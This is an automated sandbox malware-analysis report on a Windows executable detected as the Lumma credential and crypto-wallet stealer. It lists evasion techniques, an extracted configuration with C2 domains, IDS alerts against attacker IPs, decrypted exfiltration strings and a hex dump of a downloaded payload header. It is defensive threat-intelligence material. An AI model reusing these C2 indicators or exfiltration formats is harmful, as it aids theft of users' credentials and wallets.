Edit tour

Windows Analysis Report
0zBsv1tnt4.exe

Overview

General Information

Sample name:	0zBsv1tnt4.exe renamed because original name is a hash value
Original sample name:	27e0a573048fadb3dd4b3b2454c8eda5.exe
Analysis ID:	1580958
MD5:	27e0a573048fadb3dd4b3b2454c8eda5
SHA1:	c841c7fd14f4982e37aed56b25c0d748902fa9e2
SHA256:	6d6884e9912854c20c4dea409280402b3e27a0448407ad7f37c3fb642ee60525
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to detect virtual machines (SLDT)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

0zBsv1tnt4.exe (PID: 1868 cmdline: "C:\Users\user\Desktop\0zBsv1tnt4.exe" MD5: 27E0A573048FADB3DD4B3B2454C8EDA5)

chrome.exe (PID: 740 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 4940 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=2040,i,2396547000121627558,15890828269926953277,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7560 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7728 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1896,i,7583423197592999893,9247064027029795197,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["prisonyfork.buzz", "appliacnesot.buzz", "screwamusresz.buzz", "inherineau.buzz", "hummskitnj.buzz", "mindhandru.buzz", "rebuildeso.buzz", "cashfuzysao.buzz", "scentniej.buzz"], "Build id": "LOGS11--LiveTraffic"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1597829853.00000000014E6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1597724019.00000000014E2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 0zBsv1tnt4.exe PID: 1868	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 0zBsv1tnt4.exe PID: 1868	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 0zBsv1tnt4.exe PID: 1868	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 0zBsv1tnt4.exe PID: 1868	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T14:14:25.449248+0100	2028371	3	Unknown Traffic	192.168.2.8	49704	104.21.11.101	443	TCP
2024-12-26T14:14:27.781903+0100	2028371	3	Unknown Traffic	192.168.2.8	49705	104.21.11.101	443	TCP
2024-12-26T14:14:30.418418+0100	2028371	3	Unknown Traffic	192.168.2.8	49706	104.21.11.101	443	TCP
2024-12-26T14:14:33.112794+0100	2028371	3	Unknown Traffic	192.168.2.8	49707	104.21.11.101	443	TCP
2024-12-26T14:14:35.897979+0100	2028371	3	Unknown Traffic	192.168.2.8	49708	104.21.11.101	443	TCP
2024-12-26T14:14:38.986509+0100	2028371	3	Unknown Traffic	192.168.2.8	49709	104.21.11.101	443	TCP
2024-12-26T14:14:42.159644+0100	2028371	3	Unknown Traffic	192.168.2.8	49713	104.21.11.101	443	TCP
2024-12-26T14:14:47.861020+0100	2028371	3	Unknown Traffic	192.168.2.8	49714	104.21.11.101	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T14:14:26.464403+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49704	104.21.11.101	443	TCP
2024-12-26T14:14:28.707281+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49705	104.21.11.101	443	TCP
2024-12-26T14:14:48.620218+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49714	104.21.11.101	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T14:14:26.464403+0100	2049836	1	A Network Trojan was detected	192.168.2.8	49704	104.21.11.101	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T14:14:28.707281+0100	2049812	1	A Network Trojan was detected	192.168.2.8	49705	104.21.11.101	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T14:14:50.201932+0100	2019714	2	Potentially Bad Traffic	192.168.2.8	49715	185.215.113.16	80	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-26T14:14:31.430780+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.8	49706	104.21.11.101	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 0zBsv1tnt4.exe

Avira: detected

Found malware configuration

Source: 0zBsv1tnt4.exe.1868.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["prisonyfork.buzz", "appliacnesot.buzz", "screwamusresz.buzz", "inherineau.buzz", "hummskitnj.buzz", "mindhandru.buzz", "rebuildeso.buzz", "cashfuzysao.buzz", "scentniej.buzz"], "Build id": "LOGS11--LiveTraffic"}

Multi AV Scanner detection for submitted file

Source: 0zBsv1tnt4.exe	Virustotal: Detection: 52%			Perma Link
Source: 0zBsv1tnt4.exe	ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 0zBsv1tnt4.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: hummskitnj.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cashfuzysao.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: appliacnesot.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: screwamusresz.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: inherineau.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: scentniej.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rebuildeso.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: prisonyfork.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: mindhandru.buzz
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.1458563453.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: LOGS11--LiveTraffic

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe

Code function: 0_2_009658D5 CryptUnprotectData,

0_2_009658D5

Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0zBsv1tnt4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon

Source: 0zBsv1tnt4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 23.206.229.226:443 -> 192.168.2.8:49740 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.8:49714 version: TLS 1.2

Source:

Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 0zBsv1tnt4.exe, 00000000.00000002.1877383452.0000000006512000.00000040.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00971A10
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	0_2_00973B50
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	0_2_00990340
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0097D34A
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov eax, ebx	0_2_00977440
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h]	0_2_00977440
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edi, dword ptr [esi+30h]	0_2_0095CC7A
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-16h]	0_2_00990D20
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edx, ebx	0_2_00958600
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_00972E6D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then jmp edx	0_2_00972E6D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	0_2_00972E6D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-16h]	0_2_00991720
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0097C09E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov eax, ebx	0_2_0096C8A0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-000000BEh]	0_2_0096C8A0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx+0Ah]	0_2_0096C8A0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2E3D7ACEh]	0_2_0096C8A0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_0096D8AC
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_0096D8AC
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov esi, ecx	0_2_009790D0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0097E0DA
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_0096D8D8
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_0096D8D8
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edx, ecx	0_2_0096B8F6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edx, ecx	0_2_0096B8F6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0097C0E6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then push esi	0_2_0095C805
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00972830
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]	0_2_0098C830
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0097C850
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	0_2_0098C990
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0097B980
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then jmp edx	0_2_009739B9
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	0_2_009739B9
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_009781CC
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_009789E9
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_0097D116
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0097C09E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	0_2_0097B170
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_0097D17D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-16h]	0_2_00991160
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov eax, dword ptr [00996130h]	0_2_00968169
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0097AAC0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00986210
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then lea esi, dword ptr [eax+00000270h]	0_2_00958A50
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 385488F2h	0_2_0098CA40
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6E2DD57Fh]	0_2_0096EB80
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_009573D0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_009573D0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_009783D8
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edx, ecx	0_2_00968B1B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_0096C300
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah]	0_2_0095AB40
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00964CA0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0096747D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov word ptr [edx], di	0_2_0096747D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx edx, byte ptr [eax+edi-74D5A7FEh]	0_2_0097C465
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0097C465
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edi, ecx	0_2_0097A5B6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+eax-46h]	0_2_0098EDC1
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	0_2_0098CDF0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-3ECB279Fh]	0_2_0098CDF0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	0_2_0098CDF0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7F7BECC6h	0_2_0098CDF0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0097DDFF
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edx, ecx	0_2_00976D2E
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00978528
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then dec edx	0_2_0098FD70
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+61765397h]	0_2_0096B57D
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edx, ecx	0_2_00979E80
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-16h]	0_2_009906F0
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0097DE07
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then dec edx	0_2_0098FE00
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov dword ptr [esp+20h], eax	0_2_00959780
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then jmp edx	0_2_009737D6
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov ecx, eax	0_2_0097BF13
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov edi, dword ptr [esp+28h]	0_2_00975F1B
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then jmp eax	0_2_00979739
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00966F52
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]	0_2_00977740

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49714 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49705 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49705 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49704 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49704 -> 104.21.11.101:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49706 -> 104.21.11.101:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: prisonyfork.buzz
Source: Malware configuration extractor	URLs: appliacnesot.buzz
Source: Malware configuration extractor	URLs: screwamusresz.buzz
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: mindhandru.buzz
Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz
Source: Malware configuration extractor	URLs: scentniej.buzz

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 26 Dec 2024 13:14:49 GMTContent-Type: application/octet-streamContent-Length: 2868736Last-Modified: Thu, 26 Dec 2024 12:23:49 GMTConnection: keep-aliveETag: "676d4ad5-2bc600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2c 00 00 04 00 00 05 73 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 40 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 05 00 00 00 60 00 00 00 06 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6a 71 64 